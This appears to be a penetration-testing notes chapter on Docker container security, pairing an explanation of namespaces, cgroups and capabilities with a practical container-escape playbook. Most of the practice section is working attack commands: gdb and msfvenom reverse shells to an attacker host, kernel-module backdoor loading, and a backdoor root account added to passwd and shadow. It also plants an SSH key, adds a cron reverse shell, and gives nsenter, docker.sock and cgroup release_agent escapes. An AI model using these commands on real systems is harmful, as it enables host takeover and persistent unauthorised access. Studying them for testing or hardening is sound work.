Docker

This chapter covers the basic theory around Docker containers security and how to escape them.

Theory

Docker containers are not a security technology by themselves, but rather a packaging and deployment mechanism that leverages existing Linux kernel security features. Docker security is based on 3 major mechanisms creating process isolation and resource control : namespaces, cgroups, capabilities.

Docker's security model assumes proper configuration of these mechanisms. Misconfigurations in any layer can lead to container escape and host compromise.

Namespaces: Process-Level Isolation

Namespaces are a Linux kernel feature that partitions kernel resources so that one set of processes sees one set of resources while another set of processes sees a different set of resources. Docker leverages six types of namespaces:

PID Namespace: Isolates process IDs. Processes in a container see only processes within the same container, with the main process appearing as PID 1.
Network Namespace: Isolates network interfaces, routing tables, and firewall rules. Each container gets its own network stack.
Mount Namespace: Isolates filesystem mount points. Containers see only their designated filesystem view.
User Namespace: Maps container user IDs to different host user IDs (often disabled by default).
UTS Namespace: Isolates hostname and domain name. Each container can have its own hostname.
IPC Namespace: Isolates inter-process communication resources like shared memory and semaphores.

Control Groups (`cgroups`): Resource Limitation and Monitoring

cgroups are a Linux kernel feature that limits and isolates resource usage (CPU, memory, disk I/O, network) of a collection of processes. Docker uses cgroups to:

CPU Control: Limit CPU usage and set scheduling priorities
Memory Control: Limit RAM usage and prevent memory bombs
Block I/O Control: Limit disk read/write operations
Network Control: Limit network bandwidth (with additional tools)
Device Control: Control access to devices like /dev/sda

Capabilities: Privilege Control

Traditional Unix systems have a binary privilege model: root (UID 0) has all privileges, while non-root users have limited privileges. Linux capabilities break down root privileges into distinct units, allowing fine control over what privileged operations a process can perform.

Docker containers run with a restricted set of capabilities by default, dropping dangerous ones like:

CAP_SYS_ADMIN (system administration)
CAP_SYS_MODULE (kernel module loading)
CAP_SYS_PTRACE (process tracing)
CAP_DAC_OVERRIDE (override permissions sets by file owners)
CAP_SETUID CAP_SETGID (modify it's own user or group set)
CAP_NET_ADMIN (handle network related tasks on the host)

Practice

In real life situation we will need to perform a Docker container escape after obtaining a foothold on a running container. Those escape techniques allows to pivot to the host running the container and thus gain privileges.

Rapid Security Assessment

When landing on an asset running docker containers, the following command can help obtain crucial information that could be helpful for PrivEsc.

# Security check for running containers
docker ps -q | xargs docker inspect | jq '.[] | {
  Name: .Name,
  Privileged: .HostConfig.Privileged,
  Capabilities: .HostConfig.CapAdd,
  Mounts: [.Mounts[] | select(.Type=="bind") | .Source],
  PidMode: .HostConfig.PidMode,
  NetworkMode: .HostConfig.NetworkMode
}'

Capabilities Abuse

Docker drops many dangerous capabilities by default, but adding back a single high-risk capability can fully break isolation.

High-risk capabilities include:

CAP_SYS_ADMIN (most dangerous)
CAP_SYS_PTRACE
CAP_SYS_MODULE
CAP_DAC_OVERRIDE
CAP_NET_ADMIN
CAP_SETUID, CAP_SETGID

Privileged containers (--privileged) disable most security features, granting nearly all capabilities and device access. They provide multiple escape vectors.

Detection

# If capsh is available in the container
capsh --print
capsh --decode=$(grep CapEff /proc/self/status | awk '{print $2}')

# Manual way (requires capsh on the attack machine)
cat /proc/self/status | grep Cap
capsh --decode=<CapEff_value>

If CapEff is close to 0000003fffffffff means that this container is effectively privileged

`CAP_SYS_ADMIN`

CAP_SYS_ADMIN allows mounting filesystems, creating namespaces, and accessing devices. In a Docker escape context you can thus mount the host file system into the container directly.

Direct disk mount:

# Requires /dev/sda to be mounted
mkdir /mnt/host
mount /dev/sda1 /mnt/host
chroot /mnt/host /bin/bash

Not guaranteed with CAP_SYS_ADMIN alone.

Mount namespace manipulation :

# Mount 
unshare -m
mount -t proc proc /proc
mount /dev/sda1 /mnt

Always possible with CAP_SYS_ADMINh but does not equal host escape by itself. This gives filesystem control inside the container, not the host.

Condition

Can mount host FS?

CAP_SYS_ADMIN only

CAP_SYS_ADMIN + privileged

Yes

CAP_SYS_ADMIN + /dev mount

Yes

CAP_SYS_ADMIN + docker.sock

Yes

CAP_SYS_ADMIN + correct Docker defaults

`CAP_SYS_PTRACE`

CAP_SYS_PTRACE and –pid=host allows attaching to host processes and executing code in their context. The flag –pid=host allows a container to operate within the same process namespace as the host system.

Host-level code execution (requires gdb):

echo 0 > /proc/sys/kernel/yama/ptrace_scope
gdb -p 1 -batch -ex "call system(\"/bin/bash\")"
gdb -p 1 -batch -ex "call system(\"bash -i >& /dev/tcp/<attacker_ip>/<attacker_port> 0>&1\")"

Process injection:

# Create payload
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f raw -o payload.bin

# Upload payload and injector to the container
# In the container, identify the process running as root in the host system to gain root access for a callback.
ps auxx | grep root

# Inject the payload in the process
./injector <root-process-pid> payload.bin

# Open listener on attack device
 pwncat-cs -lp <attacker_port>

The injector I use:

GitHub - gaffe23/linux-inject: Tool for injecting a shared object into a Linux processGitHub

`CAP_SYS_MODULE`

CAP_SYS_MODULE allows loading arbitrary kernel modules, leads to instant host compromise.

insmod backdoor.ko

The Kernel module backdoor I use:

GitHub - matheuspd/Linux-Kernel-Module-Backdoor-Demonstration: A simple example of a linux kernel module that implements a backdoor that can communicate with another computer, receive shell commands, and send the responses of those commands back, i.e., performs a reverse shell. In addition, it can take screenshots and read the user input (keylogger).GitHub

`CAP_DAC_OVERRIDE`

CAP_DAC_OVERRIDE allows to bypass file permission checks (requires host file system mount).

# If host root mounted at /host
chroot /host /bin/bash

# Create backdoor user
echo "backdoor:x:0:0::/root:/bin/bash" >> /host/etc/passwd
echo "backdoor:\$6\<salt>\<hash>" >> /host/etc/shadow

# Install SSH key
mkdir -p /host/root/.ssh
echo "ssh-rsa AAAAB3... attacker" >> /host/root/.ssh/authorized_keys

# Persistent access via cron
echo "* * * * * root bash -i >& /dev/tcp/<attacker_ip>/<attacker_port> 0>&1" >> /host/etc/crontab

Namespaces Abuse

If a container shares namespaces with the host or gains the ability to enter them, isolation collapses.

Dangerous namespace configurations:

--pid=host
--net=host
--ipc=host
Writable /proc, /sys
nsenter available

Detection

# Inside a container
ls -l /proc/1/ns

# Outside a container
docker inspect <container> | jq '.HostConfig'

Look for:

PidMode: "host"
NetworkMode: "host"

PID Namespace Escape (`--pid=host`)

Host processes are visible and targetable.

nsenter -t 1 -m -u -i -n -p /bin/bash

You we now inside the host namespaces.

`/proc` Abuse

/proc exposes kernel and process internals.

ls /proc/1/root
chroot /proc/1/root /bin/bash

This is one of the simplest real-world escapes.

Mount Namespace Abuse

Writable mount namespaces allow filesystem manipulation.

mount | grep "/"
mount -o remount,rw /

Docker Socket Namespace Escape

Docker socket allows to reach the Docker Engine API from a container thanks to the socket. If Docker CLI is available on the container you can interact with other containers, spin new ones, ...

# Search for docker.sock, could be somewhere else
ls -la /var/run/docker.sock

# Check if the Docker Engine API is reachable
docker ps

Spin a new container with a host bind mount and privileges:

docker run -it --privileged -v /:/mnt alpine chroot /mnt /bin/sh

This is the most common container escape in the wild.

`cgroups` Abuse

Cgroups limit resources, but misconfigured cgroups can be abused to execute code on the host. This attack is independent of Docker and targets the Linux kernel directly.

Detection

mount | grep cgroup
ls /sys/fs/cgroup

Writable cgroup mounts are a red flag.

cgroup `release_agent` Escape

When a cgroup is released, the kernel executes a user-defined binary on the host.

mkdir /tmp/cgrp
mount -t cgroup memory cgroup /tmp/cgrp
mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
echo "/bin/bash" > /tmp/cgrp/release_agent
echo $$ > /tmp/cgrp/x/cgroup.procs

This results in host command execution.

Resources

Container Breakouts – Part 3: Docker SocketNody´s blog

Container Breakouts – Part 2: Privileged ContainerNody´s blog

Container Breakouts – Part 1: Access to root directory of the HostNody´s blog

https://redfoxsec.com/blog/exploiting-excessive-container-capabilities/redfoxsec.com

2375, 2376 Pentesting Docker - HackTricksbook.hacktricks.wiki

Last updated 24 days ago

hashtagTheory

hashtagNamespaces: Process-Level Isolation

hashtagControl Groups (cgroups): Resource Limitation and Monitoring

hashtagCapabilities: Privilege Control

hashtagPractice

hashtagCapabilities Abuse

hashtagDetection

hashtagCAP_SYS_ADMIN

hashtagCAP_SYS_PTRACE

hashtagCAP_SYS_MODULE

hashtagCAP_DAC_OVERRIDE

hashtagNamespaces Abuse

hashtagDetection

hashtagPID Namespace Escape (--pid=host)

hashtag/proc Abuse

hashtagMount Namespace Abuse

hashtagDocker Socket Namespace Escape

hashtagcgroups Abuse

hashtagDetection

hashtagcgroup release_agent Escape

hashtagResources

Theory

Namespaces: Process-Level Isolation

Control Groups (`cgroups`): Resource Limitation and Monitoring

Capabilities: Privilege Control

Practice

Capabilities Abuse

Detection

`CAP_SYS_ADMIN`

`CAP_SYS_PTRACE`

`CAP_SYS_MODULE`

`CAP_DAC_OVERRIDE`

Namespaces Abuse

Detection

PID Namespace Escape (`--pid=host`)

`/proc` Abuse

Mount Namespace Abuse

Docker Socket Namespace Escape

`cgroups` Abuse

Detection

cgroup `release_agent` Escape

Resources